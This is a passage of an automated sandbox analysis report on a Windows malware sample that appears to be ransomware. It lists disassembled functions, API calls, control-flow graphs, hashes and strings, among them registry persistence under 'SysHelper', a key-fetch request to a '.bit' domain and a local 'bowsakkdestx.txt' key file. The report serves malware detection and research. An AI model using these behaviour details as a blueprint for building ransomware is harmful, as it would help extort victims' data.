                                                                                                        • GetTickCount.KERNEL32 ref: 00F81FF1
                                                                                                        • Heap32ListNext.KERNEL32(?,?), ref: 00F82058
                                                                                                        • GetTickCount.KERNEL32 ref: 00F82066
                                                                                                        • GetTickCount.KERNEL32 ref: 00F82095
                                                                                                        • Process32First.KERNEL32(?,00000128), ref: 00F820AA
                                                                                                        • GetTickCount.KERNEL32 ref: 00F820FB
                                                                                                        • GetTickCount.KERNEL32 ref: 00F82118
                                                                                                        • GetTickCount.KERNEL32 ref: 00F82187
                                                                                                        • GetTickCount.KERNEL32 ref: 00F821A4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32Version
                                                                                                        • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                        • API String ID: 4174345323-1723836103
                                                                                                        • Opcode ID: 72bb0da8c2557466956fec55b27a0c0aff4f3de7990ee28a52404f577923dbec
                                                                                                        • Instruction ID: d3a4c63768625251bb3fb947a49b1bf702bd4c1709ef947ebdb61794e2772a0e
                                                                                                        • Opcode Fuzzy Hash: 72bb0da8c2557466956fec55b27a0c0aff4f3de7990ee28a52404f577923dbec
                                                                                                        • Instruction Fuzzy Hash: 933261B0E0022D9ADF60AF64CC45BEEB679BF45700F0441EAE60CE6151EB749E84EF55
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1E690 Relevance: 110.9, APIs: 54, Strings: 9, Instructions: 696stringnetworkfileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 776 f1e690-f1e6d8 call f2f7c0 timeGetTime call f23f74 call f0c6a0 783 f1e6e0-f1e6e6 776->783 784 f1e6f0-f1e722 call f2b420 call f0c500 783->784 789 f1e724-f1e729 784->789 790 f1e72e-f1e772 InternetOpenW 784->790 791 f1ea1f-f1ea40 call f23cf0 789->791 792 f1e774-f1e776 790->792 793 f1e778-f1e77d 790->793 800 f1ea42-f1ea46 791->800 801 f1ea8d-f1eacc lstrlenA lstrcpyA * 2 lstrlenA 791->801 795 f1e78f-f1e7b8 call f15ae0 call f21c02 792->795 796 f1e780-f1e789 793->796 816 f1e882-f1e8e5 call f15ae0 call f13ff0 call f12900 call f159d0 795->816 817 f1e7be-f1e7f7 call f14690 call f0dd40 795->817 796->796 798 f1e78b-f1e78d 796->798 798->795 804 f1ee2a call f11b10 800->804 805 f1ea4c-f1ea61 SHGetFolderPathA 800->805 806 f1eaef-f1eb12 801->806 807 f1eace 801->807 818 f1ee2f-f1ee3a 804->818 805->784 812 f1ea67-f1ea88 PathAppendA DeleteFileA 805->812 810 f1eb14-f1eb16 806->810 811 f1eb18-f1eb1f 806->811 813 f1ead0-f1ead8 807->813 819 f1eb2b-f1eb4f call f156d0 call f12900 810->819 820 f1eb22-f1eb27 811->820 812->784 814 f1eaeb 813->814 815 f1eada-f1eae7 lstrlenA 813->815 814->806 815->813 821 f1eae9 815->821 875 f1e8f3-f1e917 lstrcpyW 816->875 876 f1e8e7-f1e8f0 call f22587 816->876 840 f1e7f9-f1e7fe 817->840 841 f1e86f-f1e874 817->841 823 f1ee4d-f1ee82 call f0ef50 818->823 824 f1ee3c-f1ee3f 818->824 845 f1eb51 819->845 846 f1eb53-f1eb66 lstrcpyW 819->846 820->820 826 f1eb29 820->826 821->806 837 f1ee86-f1ee8c 823->837 824->783 826->819 842 f1ee92-f1ee94 837->842 843 f1ee8e-f1ee90 837->843 848 f1e800-f1e809 call f22587 840->848 849 f1e80c-f1e827 840->849 841->816 847 f1e876-f1e87f call f22587 841->847 852 f1ee97-f1ee9c 842->852 850 f1eea0-f1eeaf call f13ea0 843->850 845->846 853 f1eb74-f1ebe4 lstrlenA call f20c62 call f2b420 MultiByteToWideChar lstrcpyW call f23cf0 846->853 854 f1eb68-f1eb71 call f22587 846->854 847->816 848->849 860 f1e842-f1e848 849->860 861 f1e829-f1e82d 849->861 850->837 872 f1eeb1-f1eee3 call f0ef50 850->872 852->852 863 f1ee9e 852->863 900 f1ebe6-f1ebea 853->900 901 f1ec3d-f1ec97 lstrlenW lstrlenA lstrcpyA * 2 lstrlenA 853->901 854->853 866 f1e84e-f1e86c 860->866 861->866 870 f1e82f-f1e840 call f205a0 861->870 863->850 866->841 870->866 891 f1eee7-f1eeed 872->891 879 f1e943-f1e97a InternetOpenUrlW InternetReadFile 875->879 880 f1e919-f1e920 875->880 876->875 887 f1e9ec-f1ea08 InternetCloseHandle * 2 879->887 888 f1e97c-f1e994 SHGetFolderPathA 879->888 880->879 885 f1e922-f1e92e 880->885 892 f1e930-f1e935 885->892 893 f1e937 885->893 889 f1ea16-f1ea19 887->889 890 f1ea0a-f1ea13 call f22587 887->890 888->887 895 f1e996-f1e9c2 PathAppendA call f220b6 888->895 889->791 890->889 897 f1eef3-f1eef5 891->897 898 f1eeef-f1eef1 891->898 899 f1e93c-f1e93d lstrcatW 892->899 893->899 895->887 915 f1e9c4-f1e9e4 lstrlenA call f22b02 call f23a38 895->915 905 f1eef8-f1eefd 897->905 904 f1ef01-f1ef10 call f13ea0 898->904 899->879 900->804 906 f1ebf0-f1ec11 SHGetFolderPathA 900->906 908 f1ec99 901->908 909 f1ecbf-f1ecdd 901->909 904->891 926 f1ef12-f1ef4c call f13ff0 call f12900 904->926 905->905 912 f1eeff 905->912 906->784 914 f1ec17-f1ec38 PathAppendA DeleteFileA 906->914 916 f1eca0-f1eca8 908->916 910 f1ece3-f1eced 909->910 911 f1ecdf-f1ece1 909->911 918 f1ecf0-f1ecf5 910->918 917 f1ecf9-f1ed1b call f156d0 call f12900 911->917 912->904 914->783 931 f1e9e9 915->931 921 f1ecbb 916->921 922 f1ecaa-f1ecb7 lstrlenA 916->922 937 f1ed1d 917->937 938 f1ed1f-f1ed35 lstrcpyW 917->938 918->918 924 f1ecf7 918->924 921->909 922->916 923 f1ecb9 922->923 923->909 924->917 939 f1ef50-f1ef68 lstrcpyW 926->939 940 f1ef4e 926->940 931->887 937->938 941 f1ed43-f1edab lstrlenA call f20c62 call f2b420 MultiByteToWideChar lstrcpyW lstrlenW 938->941 942 f1ed37-f1ed40 call f22587 938->942 944 f1ef76-f1efb3 call f13ff0 call f12900 939->944 945 f1ef6a-f1ef73 call f22587 939->945 940->939 956 f1edad-f1edb6 lstrlenW 941->956 957 f1edbc-f1edc1 941->957 942->941 962 f1efb5 944->962 963 f1efb7-f1efc6 lstrcpyW 944->963 945->944 956->957 959 f1ee44-f1ee48 956->959 960 f1ee10-f1ee12 957->960 961 f1edc3-f1ede4 SHGetFolderPathA 957->961 964 f1f01a-f1f030 959->964 966 f1ee14-f1ee1a call f20bed 960->966 967 f1ee1d-f1ee1f 960->967 961->784 965 f1edea-f1ee0b PathAppendA DeleteFileA 961->965 962->963 968 f1efd4-f1efe0 963->968 969 f1efc8-f1efd1 call f22587 963->969 965->783 966->967 967->804 973 f1ee21-f1ee27 call f20bed 967->973 970 f1efe2-f1efeb call f22587 968->970 971 f1efee-f1f008 968->971 969->968 970->971 978 f1f016 971->978 979 f1f00a-f1f013 call f22587 971->979 973->804 978->964 979->978
                                                                                                        APIs
                                                                                                        • timeGetTime.WINMM(?,?,?,?,?,00FCB3EC,000000FF), ref: 00F1E6C0
                                                                                                          • Part of subcall function 00F0C6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,00F1E6D4), ref: 00F0C6C2
                                                                                                          • Part of subcall function 00F0C6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 00F0C6F3
                                                                                                          • Part of subcall function 00F0C6A0: RegCloseKey.ADVAPI32(00000000), ref: 00F0C700
                                                                                                        • _memset.LIBCMT ref: 00F1E707
                                                                                                          • Part of subcall function 00F0C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00F0C51B
                                                                                                        • InternetOpenW.WININET ref: 00F1E743
                                                                                                        • _wcsstr.LIBCMT ref: 00F1E7AE
                                                                                                        • _memmove.LIBCMT ref: 00F1E838
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00F1E90A
                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 00F1E93D
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F1E954
                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00F1E96F
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1E98C
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1E9A3
                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00F1E9CD
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F1E9F3
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F1E9F6
                                                                                                        • _strstr.LIBCMT ref: 00F1EA36
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1EA59
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1EA74
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F1EA82
                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00F1EA92
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F1EAA4
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F1EABA
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F1EAC8
                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00F1EAE3
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F1EB5B
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F1EB7C
                                                                                                        • _malloc.LIBCMT ref: 00F1EB86
                                                                                                        • _memset.LIBCMT ref: 00F1EB94
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00F1EBAE
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F1EBB6
                                                                                                        • _strstr.LIBCMT ref: 00F1EBDA
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1EC00
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1EC24
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F1EC32
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F1EC3E
                                                                                                        • lstrlenA.KERNEL32(","id":"), ref: 00F1EC51
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F1EC6D
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F1EC7F
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F1EC93
                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00F1ECB3
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F1ED2A
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F1ED4B
                                                                                                        • _malloc.LIBCMT ref: 00F1ED55
                                                                                                        • _memset.LIBCMT ref: 00F1ED63
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 00F1ED7D
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F1ED85
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F1EDA3
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F1EDAE
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1EDD3
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1EDF7
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F1EE05
                                                                                                        • _free.LIBCMT ref: 00F1EE15
                                                                                                        • _free.LIBCMT ref: 00F1EE22
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F1EF61
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F1EFBF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                        • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                        • API String ID: 704684250-3586605218
                                                                                                        • Opcode ID: 55ce11a24ad8376b135d6d715a75d158fdf64117fbf61b9133e4ac2685069954
                                                                                                        • Instruction ID: 4629611c7f9070999ca097347d41aee2fc74c5660c34c105f154c39d15e4f4fe
                                                                                                        • Opcode Fuzzy Hash: 55ce11a24ad8376b135d6d715a75d158fdf64117fbf61b9133e4ac2685069954
                                                                                                        • Instruction Fuzzy Hash: 3842E471508345ABD720DF24DC49BDB7BE8BF84304F04091CF98997292DB75E689EBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F10FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00F11010
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F11026
                                                                                                          • Part of subcall function 00F30ECA: RaiseException.KERNEL32(?,?,00F4F26B,?,?,00000000,?,?,?,?,00F4F26B,?,010081FC,?), ref: 00F30F1F
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00F1103B
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F11051
                                                                                                        • lstrlenA.KERNEL32(?,00000000), ref: 00F11059
                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00F11064
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1107A
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00F11099
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F110AB
                                                                                                        • _memset.LIBCMT ref: 00F110CA
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00F110DE
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F110F0
                                                                                                        • _malloc.LIBCMT ref: 00F11100
                                                                                                        • _memset.LIBCMT ref: 00F1110B
                                                                                                        • _sprintf.LIBCMT ref: 00F1112E
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00F1113C
                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00F11154
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00F1115F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                        • String ID: %.2X
                                                                                                        • API String ID: 2451520719-213608013
                                                                                                        • Opcode ID: c076479055d568baff10e890f537bdc53a613fe84c7d16e2c5cfb5af2085aef4
                                                                                                        • Instruction ID: 3cb4d184a8440f66c61048184cf4d38d00bb1f3ffe9b0cf68b6bf12941d9ba8c
                                                                                                        • Opcode Fuzzy Hash: c076479055d568baff10e890f537bdc53a613fe84c7d16e2c5cfb5af2085aef4
                                                                                                        • Instruction Fuzzy Hash: 27518071D40219BBDB11DBA0DD46FEFBBB8FB04714F100026FA05F6181EB756A419BA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F0F730 Relevance: 29.2, APIs: 19, Instructions: 732COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F11AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F11ACA
                                                                                                          • Part of subcall function 00F11AB0: DispatchMessageW.USER32(?), ref: 00F11AE0
                                                                                                          • Part of subcall function 00F11AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F11AEE
                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 00F0F900
                                                                                                        • _memmove.LIBCMT ref: 00F0F9EA
                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 00F0FA51
                                                                                                        • _memmove.LIBCMT ref: 00F0FADA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                        • String ID:
                                                                                                        • API String ID: 273148273-0
                                                                                                        • Opcode ID: 172bfcb705a5a05a9e97b70c860205e43b7b9ee5f90cb337f39604766f3fddf7
                                                                                                        • Instruction ID: 21cb7e29f1018eb787b2df6e065ffb0e17047c7905f91c588cde098636bfd895
                                                                                                        • Opcode Fuzzy Hash: 172bfcb705a5a05a9e97b70c860205e43b7b9ee5f90cb337f39604766f3fddf7
                                                                                                        • Instruction Fuzzy Hash: BF529F71D00209DBDF20DFA8DC85BDEB7F5BF04308F148169E419A7291E775AA88EB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F0E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1515 f0e870-f0e8d6 call f156d0 CryptAcquireContextW 1518 f0e8d8-f0e8e4 call f30eca 1515->1518 1519 f0e8e9-f0e901 CryptCreateHash 1515->1519 1518->1519 1521 f0e903-f0e90f call f30eca 1519->1521 1522 f0e914-f0e930 CryptHashData 1519->1522 1521->1522 1524 f0e932-f0e93e call f30eca 1522->1524 1525 f0e943-f0e961 CryptGetHashParam 1522->1525 1524->1525 1527 f0e963-f0e96f call f30eca 1525->1527 1528 f0e974-f0e9a6 call f20be4 call f2b420 CryptGetHashParam 1525->1528 1527->1528 1534 f0e9a8-f0e9b4 call f30eca 1528->1534 1535 f0e9b9-f0e9bb 1528->1535 1534->1535 1537 f0e9c0-f0e9c3 1535->1537 1538 f0ea10-f0ea31 call f22110 CryptDestroyHash CryptReleaseContext 1537->1538 1539 f0e9c5-f0e9df call f204a6 1537->1539 1544 f0ea33-f0ea3b call f22587 1538->1544 1545 f0ea3e-f0ea50 1538->1545 1546 f0e9e1-f0e9f0 call f13ea0 1539->1546 1547 f0e9f2-f0e9f5 1539->1547 1544->1545 1546->1537 1550 f0e9f8-f0e9fd 1547->1550 1550->1550 1553 f0e9ff-f0ea0e call f13ea0 1550->1553 1553->1537
                                                                                                        APIs
                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00FFFCA4,00000000,00000000), ref: 00F0E8CE
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F0E8E4
                                                                                                          • Part of subcall function 00F30ECA: RaiseException.KERNEL32(?,?,00F4F26B,?,?,00000000,?,?,?,?,00F4F26B,?,010081FC,?), ref: 00F30F1F
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00F0E8F9
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F0E90F
                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 00F0E928
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F0E93E
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00F0E95D
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F0E96F
                                                                                                        • _memset.LIBCMT ref: 00F0E98E
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00F0E9A2
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F0E9B4
                                                                                                        • _sprintf.LIBCMT ref: 00F0E9D3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                        • String ID: %.2X
                                                                                                        • API String ID: 1084002244-213608013
                                                                                                        • Opcode ID: 292ce2ac8b575ca4fff3e63b05dc29279dbcbc04291c9099c512bb279335b035
                                                                                                        • Instruction ID: 6db78cb814bca9f4922a027c7ce129c8b0f1dce952783cb62494cbfd4d9448b3
                                                                                                        • Opcode Fuzzy Hash: 292ce2ac8b575ca4fff3e63b05dc29279dbcbc04291c9099c512bb279335b035
                                                                                                        • Instruction Fuzzy Hash: 58517071E40209EBEF11DFA0DD46FEEBBB8EB04714F10442AF901B61C1D775AA45ABA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F0EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1556 f0eaa0-f0eb09 call f156d0 CryptAcquireContextW 1559 f0eb0b-f0eb17 call f30eca 1556->1559 1560 f0eb1c-f0eb34 CryptCreateHash 1556->1560 1559->1560 1562 f0eb36-f0eb42 call f30eca 1560->1562 1563 f0eb47-f0eb56 CryptHashData 1560->1563 1562->1563 1564 f0eb58-f0eb64 call f30eca 1563->1564 1565 f0eb69-f0eb87 CryptGetHashParam 1563->1565 1564->1565 1568 f0eb89-f0eb95 call f30eca 1565->1568 1569 f0eb9a-f0ebcc call f20be4 call f2b420 CryptGetHashParam 1565->1569 1568->1569 1575 f0ebce-f0ebda call f30eca 1569->1575 1576 f0ebdf 1569->1576 1575->1576 1578 f0ebe1-f0ebe4 1576->1578 1579 f0ebe6-f0ec00 call f204a6 1578->1579 1580 f0ec38-f0ec67 call f22110 CryptDestroyHash CryptReleaseContext 1578->1580 1585 f0ec02-f0ec11 call f13ea0 1579->1585 1586 f0ec13-f0ec19 1579->1586 1585->1578 1588 f0ec20-f0ec25 1586->1588 1588->1588 1590 f0ec27-f0ec36 call f13ea0 1588->1590 1590->1578
                                                                                                        APIs
                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00FFFCA4,00000000,00000000,00000000,?), ref: 00F0EB01
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F0EB17
